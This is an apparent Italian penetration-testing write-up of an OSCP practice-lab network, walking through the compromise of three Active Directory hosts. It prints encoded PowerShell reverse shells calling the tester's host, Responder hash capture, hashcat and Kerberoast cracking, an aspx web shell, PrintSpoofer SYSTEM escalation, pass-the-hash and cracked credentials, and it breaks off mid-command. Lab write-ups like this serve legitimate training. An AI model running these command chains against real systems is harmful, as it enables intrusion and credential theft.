Vai al contenuto

OSCP B

Network

IP NAME ORDER STATUS
10.10.140.146 DC01 3 OWNED
192.168.180.147
10.10.140.147		 MS01 1 OWNED
10.10.140.148 MS02 2 OWNED
192.168.199.149 Kiero 4 OWNED
192.168.149.150 Berlin 5 OWNED
192.168.149.151 Gust 6 OWNED

Objectives

This is the second of three dedicated OSCP Challenge Labs. It is composed of six OSCP machines. The intention of this Challenge is to provide a mock-exam experience that closely reflects a similar level of difficulty to that of the actual OSCP exam.

The challenge contains three machines that are connected via Active Directory, and three standalone machines that do not have any dependencies or intranet connections. All the standalone machines have a local.txt and a proof.txt, however the Active Directory set only has a proof.txt on the Domain Controller. While the Challenge Labs have no point values, on the exam the standalone machines would be worth 20 points each for a total of 60 points. The Active Directory set is worth 40 points all together, and the entire domain must be compromised to achieve any points for it at all.

All the intended attack vectors for these machines are taught in the PEN-200 Modules, or are leveraged in PEN-200 Challenge Labs 1-3. However, the specific requirements to trigger the vulnerabilities may differ from the exact scenarios and techniques demonstrated in the course material. You are expected to be able to take the demonstrated exploitation techniques and modify them for the current environment.

Please feel free to complete this challenge at your own pace. While the OSCP exam lasts for 23:45 hours, it is designed so that the machines can be successfully attacked in much less time. While each student is different, we highly recommend that you plan to spend a significant amount of time resting, eating, hydrating, and sleeping during your exam. Thus, we explicitly do not recommend that you attempt to work on this Challenge Lab for 24 hours straight.

We recommend that you begin with a network scan on all the provided IP addresses, and then enumerate each machine based on the results. When you are finished with the Challenge, we suggest that you create a mock-exam report for your own records, according to the advice provided in the Report Writing for Penetration Testers Module.

Good luck!

Credentials

Credenziali recuperate:

  • web_svc:Diamond1
  • sql_svc:Dolphin1

DC01

Enumeration

Exploit

Accedo tramite Evil-WinRM utilizzando l'hash di Administrator trovato nella macchina MS02:

PowerShell
┌──(momphuckerkali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ evil-winrm -i 10.10.140.146 -u Administrator -H '59b280ba707d22e3ef0aa587fc29ffe5'

Privilege Escalation

Apro una shell interattiva passando dal port forwarding della macchina MS01:

PowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0ADAALgAxADQANwAiACwANQA1ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

E si apre la shell come Administrator macchina kali:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5566    
listening on [any] 5566 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 49263

PS C:\Users\Administrator\Documents> whoami
oscp\administrator

Infine recupero la flag proof.txt:

001.png

MS01

Enumeration

PORT SERVICE VERSION NOTES
21/tcp ftp FTP
22/tcp ssh SSH
135/tcp msrpc MSRPC
139/tcp netbios-ssn SMB
445/tcp microsoft-ds SMB
5040/tcp unknown
5985/tcp wsman OMI
8000/tcp http-alt
8443/tcp https-alt
47001/tcp winrm WINRM
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.180.147      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 15:30 CET
Nmap scan report for 192.168.180.147
Host is up (0.074s latency).
Not shown: 65516 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
5985/tcp  open  wsman
8000/tcp  open  http-alt
8080/tcp  open  http-proxy
8443/tcp  open  https-alt
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -sC -sV -p21,22,135,139,445,5040,5985,8000,8080,8443,47001 -oN alltcp.txt 192.168.180.147 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 15:32 CET
Nmap scan report for 192.168.180.147
Host is up (0.070s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 e0:3a:63:4a:07:83:4d:0b:6f:4e:8a:4d:79:3d:6e:4c (RSA)
|   256 3f:16:ca:33:25:fd:a2:e6:bb:f6:b0:04:32:21:21:0b (ECDSA)
|_  256 fe:b0:7a:14:bf:77:84:9a:b3:26:59:8d:ff:7e:92:84 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: IIS Windows
8080/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2025-01-04T14:35:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=MS01.oscp.exam
| Subject Alternative Name: DNS:MS01.oscp.exam
| Not valid before: 2022-11-11T07:04:43
|_Not valid after:  2023-11-10T00:00:00
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-04T14:35:13
|_  start_date: N/A

Port 8000

002.png

Port 8080

003.png

Port 8443

004.png

Inserisco il nome del dominio (192.168.180.147) nel file /etc/hosts:

005.png

Exploit

Nel form presente su http://ms02.oscp.exam:8443 è presente il campo url che sembra chiamare un qualunque url appunto. Avvio sulla mia macchina responder:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo responder -I tun0            
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0
[...]

Compilo icampi del form nel campo url faccio chiamare \\\\192.168.45.248\momphucker.

Il tool responder cattura la chiamta con l'hash:

Bash
[...]
[SMB] NTLMv2-SSP Client   : 192.168.180.147
[SMB] NTLMv2-SSP Username : OSCP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::OSCP:83914b0b64228a0d:4C694198700FD590D3FD13666D568093:010100000000000080DEA300C15EDB01C8832CE608A464330000000002000800340039005500370001001E00570049004E002D00580047004F0032004300310046004B0059003700380004003400570049004E002D00580047004F0032004300310046004B005900370038002E0034003900550037002E004C004F00430041004C000300140034003900550037002E004C004F00430041004C000500140034003900550037002E004C004F00430041004C000700080080DEA300C15EDB0106000400020000000800300030000000000000000000000000300000EA3EC0632D9171685916F79828F3DE90EEB7F6DFBE61B469C1DB896C236245FB0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200340038000000000000000000

Inserisco l'hash nel file hashes.txt e procedo a crackarlo con hashcat:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
[...]

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ cat cracked.txt              
WEB_SVC::OSCP:83914b0b64228a0d:4c694198700fd590d3fd13666d568093:010100000000000080dea300c15edb01c8832ce608a464330000000002000800340039005500370001001e00570049004e002d00580047004f0032004300310046004b0059003700380004003400570049004e002d00580047004f0032004300310046004b005900370038002e0034003900550037002e004c004f00430041004c000300140034003900550037002e004c004f00430041004c000500140034003900550037002e004c004f00430041004c000700080080dea300c15edb0106000400020000000800300030000000000000000000000000300000ea3ec0632d9171685916f79828f3de90eeb7f6dfbe61b469c1db896c236245fb0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200340038000000000000000000:Diamond1

Trovate credenziali: web_svc:Diamond1

Non sembra essere possibile usare le credenziali per l'accesso con Evil-WinRM, ma sono valide per l'accesso FTP:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ ftp 192.168.180.147                       
Connected to 192.168.180.147.
220 Microsoft FTP Service
Name (192.168.180.147:momphucker): web_svc
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||58997|)
125 Data connection already open; Transfer starting.
11-13-22  11:17PM       <DIR>          aspnet_client
11-10-22  03:53AM       <DIR>          custerr
11-10-22  11:12PM       <DIR>          ftproot
11-14-22  12:36AM       <DIR>          history
11-10-22  11:16PM       <DIR>          logs
11-13-22  11:17PM       <DIR>          pportal
11-10-22  03:53AM       <DIR>          temp
12-01-22  03:26AM       <DIR>          wwwroot
226 Transfer complete.
ftp>

Scarico i file localmente per una migliore consultazione:

Info

In questo caso non è necessario, ma sarerebbe possibile scaricare tutti i file e la cartelle con il seguente comando:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ wget -r -l 0 ftp://web_svc:Diamond1@192.168.180.147/*
[...]

Al percorso wwwroot vengono serviti i file relativi al servizio web attivo sulla porta 8000. Carico una command shell in aspx:

Text Only
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
229 Entering Extended Passive Mode (|||59183|)
125 Data connection already open; Transfer starting.
100% |*******************************|  1442       34.37 MiB/s    --:-- ETA
226 Transfer complete.
1442 bytes sent in 00:00 (19.51 KiB/s)
ftp>

E la chiamo dal servizio sulla porta 8000:

006.png

Apro un listener sulla porta 4466 ed eseguo una revershell con powershell(base64) dalla command shell:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ nc -nvlp 4466                           
listening on [any] 4466 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 59184

PS C:\windows\system32\inetsrv> whoami 
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Privilege Escalation

Provo a sfruttare il privilegio SeImpersonatePrivilege.

Carico i files neccessari su C:\users\public\documents ed eseguo, per aprire una reverse shell come SYSTEM sulla porta 4466:

PowerShell
PS C:\users\public\documents\wintools> .\PrintSpoofer64.exe -c ".\nc.exe 192.168.45.248 4466 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ nc -nvlp 4466   
listening on [any] 4466 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 59192
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

La macchina non ha flags da catturare.

Post Privilege Escalation

Verifico di poter usare SharpHound:

PowerShell
C:\Users\Public\Documents\wintools>net user /domain
net user /domain
The request will be processed at a domain controller for domain oscp.exam.


User accounts for \\DC01.oscp.exam

-------------------------------------------------------------------------------
Administrator            Aimee.Hunt               Carol.Webb               
celia.almeda             Chelsea.Byrne            Donna.Johnson            
Emily.Bishop             Frank.Farrell            Georgina.Begum           
Guest                    Jamie.Thomas             Jane.Booth               
Janice.Turner            Joan.North               john.dorian              
Kenneth.Coles            krbtgt                   Lawrence.Kay             
Leonard.Morris           Linda.Patel              Luke.Martin              
Oliver.Gray              Sandra.Craig             Shane.Mitchell           
sql_svc                  Thomas.Robinson          tom.kinney               
tom_admin                web_svc                  
The command completed with one or more errors.

Eseguo lo script per recuperare il file da eseguire su BloodHound:

PowerShell
C:\Users\Public\Documents\wintools>Sharphound.exe -c all,gpolocalgroup

Trasferisco il file localmente:

PowerShell
C:\Users\Public\Documents\wintools>.\nc.exe 192.168.45.248 1234 < 20250104073757_BloodHound.zip
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ nc  -lvp 1234 > 20250104073757_BloodHound.zip

Cambio la password di Administrator per un migliore accesso alla macchina via ssh:

PowerShell
C:\Users\Public\Documents\wintools>net user Administrator Aa.123456!

Come SYSTEM eseguo Rubeus per fare Kerberosting:

PowerShell
C:\Users\Public\Documents\wintools>Rubeus.exe kerberoast /outfile:hashes.kerberoast

Porto il file hashes.kerberoast in locale e verifico il contenuto:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ cat hashes.kerberoast        
$krb5tgs$23$*sql_svc$oscp.exam$MSSQL/MS02.oscp.exam@oscp.exam*$6BCA3DD7B17AF95CE1269FE2C178CA41$DA26C9AE7C1426985D7159B4AA1D85E5BAED1B3AEEB33AEF890421EFD2997F5263FB8FFC5DCD9A8660E172B07D2367431A0B084CCF1B10CA3AEC1F002E75E6FF96693D6DF7737F9C9C6DCAB28AD381C594998A5F257CD600846B242D2F2F5327381CA0A9AFE19B31140B2900293F4EFBCB32C12AC7DB2570506BEF056AD610413896A8D1D0D022E2521179D48D76B5A28BFFC9DBB659CA749148B802E7B8D0437D12618678505B181F344FD6DFC7A13817C875225FE6770EB4A299381EAD419F015C9DD36E0BDC6FFA579100638C6ED5DE6905B2ED52EF3070BF48BED267AE16FCE2CC5BD67105C4FB3B220EBB7204C76AD7AF64C11CCB172FB976E81E74965C1CEAC1A146D00CF1226602BEA78DA58F0497EBF5983E5036A4B3F570C8B0955BB52CE95661713A8761EA9DF7D954F6B40683D0295E7CD5BBDECF7886AF9BD5E8FBAB6DA8BA8F9E56739064E41130967BF6A4EE758D18F210AB8EA91B7486985B135BDAFEF95261EE99E141C306A7D8C6912B9CBEA686CB35D8157098A260D104EE8E73A8FAA920B066AA318B0ABB753DBA16B3E7C746F27069B61372F2641511D9A8545AC3263E9C7274E96C23A4A805A92100D2321BE19E81AF935E5DCE57C8879CDAADC54FB6B0674982D79EF3731AE4369C345EF0D742BC12D59E2289FD105A3B454515776654A74A20A926639F82B06A5E063F9D9E1BAB6E635EA181339DC08825539A4212C13276E5170751294770D4DDA00C5E93A3647B04E177B320A58CAAB1D1D62BD46153FE8983A779625A12E565BD2A0864CC4FD3814C27B069E914F9F7EF1A23D52017F47E7E17B3C5BBB56EEE18B090DA36A6A10CF12BE21405F77677F5C81D58D388842BFC04A386B4275E33E24285B662D0061ED01DFCD25201CBD5C5501460D600F6D0F2E634A7E5A62C7865E5BB7242FCD888101E5CDBBEC91793A75BA01AAAFD5AB2D956B0D933E5355FE9A084AAF5D730677102949F7E403910C9A6AB2C97662985975F921A1FF2B06393DE452EF75E673264EEE474210EC7231A0F9CF9C48DE22367A538FAA106F53730B8EC25F45D4691A320AD501E6089BE5025E6FA7C3BE95764BA4785BC448EDBD97F45D8F494D9075B8E4C6DF0655190BE5120C59B0FDD14540945B92BB700691E4C8658A23B6F33B992825D9256B80774458C9D8807F5E9922B6028754F824408BE28B65FB02EF08E89CD1451B3539B6A2955A8008EE24231446AFE6EE926D2CBF870B5325D3835F8DC0988B7679BEED12FF973214DAA0DAC4DAF7DF03E869D93D8A8E7362A066DC10AE418B8723471EC1B8C932DDE1E67CFA0E91712648C2E89288A759CD8D4610E55653A91A7199EE5591B35B44F58369081D493A82C28585149A41ED94C46A2532B4B7349892AA96359C87DC7658BE1619FBDC260E5FDFF50AA4D9CAD2E673740946014E1716E66B6907247F0C64F992FEA7F5126EB6CC04A1590C487A181C696191EBA1525900F8EA8DE4442C7AB6E9C7096468BC5C8F33E4FF788009D
$krb5tgs$23$*web_svc$oscp.exam$HTTP/MS01.oscp.exam@oscp.exam*$F7EA9AF69312399A5A928D4577CDB48B$3859AEE901500BB9F5B2309419754BED0726DECC8938829E33E474A26AC2B97D767CD11C17256007FF414789E0C531B9662B7000D5B38FF7C1645F406665C65B2F2B5073F80B6BFB7CA0D11161916BF7DA3CD8A942D5E310A9F265274033534BFC54BDBB3D5E19AF8384423D962FBA8AE460853017E67327CD3B4A4D48930735D414461EA441F9335D26D3480A39B1A2DF5866646260673179C2690FD7BBFC020533DCFFEC331E30AE94C1863ADC663EA64A6CD3A44E56B65DE837B6832CF2E24DB622C6ED8E530D5B341C01432560C1CA92740EE80E1C8864C7190487913D24F19922ACB4382BCB59F8B87554E00AEB1B7770465246BF97311D87051886E4B2263FC1CC46E033BCBBC5CF98B3BF424BDA59FF1B0FBB24C801343DD44DCEFED2E55402EF17FCC600FF1B45E0E7CEA4718ACC9AE70E1D202D856803F410AD8DE3BE0159266D20219AA441204228B57EB21D31C2C835133311DA9608C269D3316899BF0E3567A0E2738192AEADE882A61630F06129954DEB09687F067A1503776CE666454527C21C596AEF604D254594D35435C10E7627F7AAE708513929B7DB9B04344E27BD5BF6C1C13E4923449AD8CDD956322FD8E44A7CEB708B38A472D2BBC13CF23676A69D81D8E0DCAD50BB9C54401A8AC2A48FD63CFDCAA2E1153FBFC6E7AD6C391E38728CFA02608A39E9E02B5A2AE04BF8F225508013196490E69446973155163D88F4B8AA7852A7F3DC481A7129922A57314C6EE859063783DD0733E64ADAD24F052C171A9D3284D17BF9E664DFB8330C675B64C3AF3F7CD4009CE07808F3820C57AED92860F13555713AB4EA031F28B94C05C088874E3D6B714033F0AC940892E626DA925B2E7DF5D4B7414F9EC4A714030C96C7902D43B1F8621493E2BD3CFB1E0EFD41222BE50CA5E402F5CB3D40C717FE2F895CFE964DBCA1C1531099AB8B1533E7708521AA02B68EBB845020D9FE6C4661B7E4936874874AC6A51EA11BC67F380CFA4C54911D5F7301293E1457DA070FCE73E22204F00221D0CB8E53DBB33D9FD75361DA14474DEDD904DCF5072501DE4E9AA0905818611899ACD594909C5E5B18A4E930E11C17CFE06FA7469138A60F34489366CDB126C16D0001AFA94A2DBEC0282289BBE6B87A0A67DB36D0268CBCF1394D87E20DC9041951A94F1A55206C3348281C9C5B7AC3A037C90BEE0D8E23A9F8379A000586D4DA2B78D4C0E59C37FE59ED62A008FAF6BF09F1F80D4797D21CE7044F58E40FE82774BEB7A20FE8B7EC18D716DD766FB76D79D58A02DA44467829E5B1F76A5753B95E55DCED003F42BF3AF7FF740F0F59AF4A36C59150132645F6977C13F4A973B2F9890A1813AE6A6D6D0279111215ACD0EB50EF224ADF1FFDB9B200E8FFC91AB6501C2262C54D1F3FB256B0622F09511349C4C49CAE2DEA9CE1A32C75F91193797BA41D2757B5B5A82521A7FAC541CD31167B238D8C02DB752E0041B4C0E997DB8E4484AAF7A2433A85E91EDC65758F9B21264FFD8070532C5A

Procedo al crack degli hash:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Recuperate nuove credenziali: sql_svc:Dolphin1

MS02

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports_ms02.txt 10.10.140.148  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 17:26 CET
Stats: 0:05:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.36% done; ETC: 17:33 (0:02:42 remaining)
Nmap scan report for 10.10.140.148
Host is up (0.10s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5040/tcp  open  unknown
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49700/tcp open  unknown

Exploit

Uso le credenziali di sql_svc:Dolphin1 per accedere tramite mssqlcon impacket:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ impacket-mssqlclient sql_svc@10.10.140.148 -windows-auth

Poi eseguo enable_xp_cmdshell e xp_cmdshell whoami:

SQL
SQL (OSCP\sql_svc  dbo@master)> enable_xp_cmdshell
[*] INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (OSCP\sql_svc  dbo@master)> xp_cmdshell whoami
output                        
---------------------------   
nt service\mssql$sqlexpress   

NULL                          

SQL (OSCP\sql_svc  dbo@master)>

Privilege Escalation

A questo punto posso eseguire i comandi.

Apro un listener in ascolto sulla macchina MS01 all'indirizzo 10.10.140.147:4466

Ed eseguo:

SQL
SQL (OSCP\sql_svc  dbo@master)> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0ADAALgAxADQANwAiACwANAA0ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Verifico i privilegi:

PowerShell
PS C:\Windows\system32> whoami                                          
nt service\mssql$sqlexpress

PS C:\Windows\system32> whoami /priv 

PRIVILEGES INFORMATION                                                          
----------------------                                                          

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Posso sfruttare il privilegio SeImpersonatePrivilege

Info

Sulla macchina MS01 inserisco le regole di routing in modo da potermi connettere direttamente alla macchina kali:

PowerShell
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=5555 connectaddress=192.168.45.248 connectport=5555

Apro un listener su kali:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5555

E dalla macchina MS02 apro la shell, connettendomi a 10.10.140.147:5555

PowerShell
PS C:\> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AC
AAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdA
AoACIAMQAwAC4AMQAwAC4AMQA0ADAALgAxADQANwAiACwANQA1ADUANQApADsAJABzAHQAcgBlAG
EAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdA
BlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AG
gAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQ
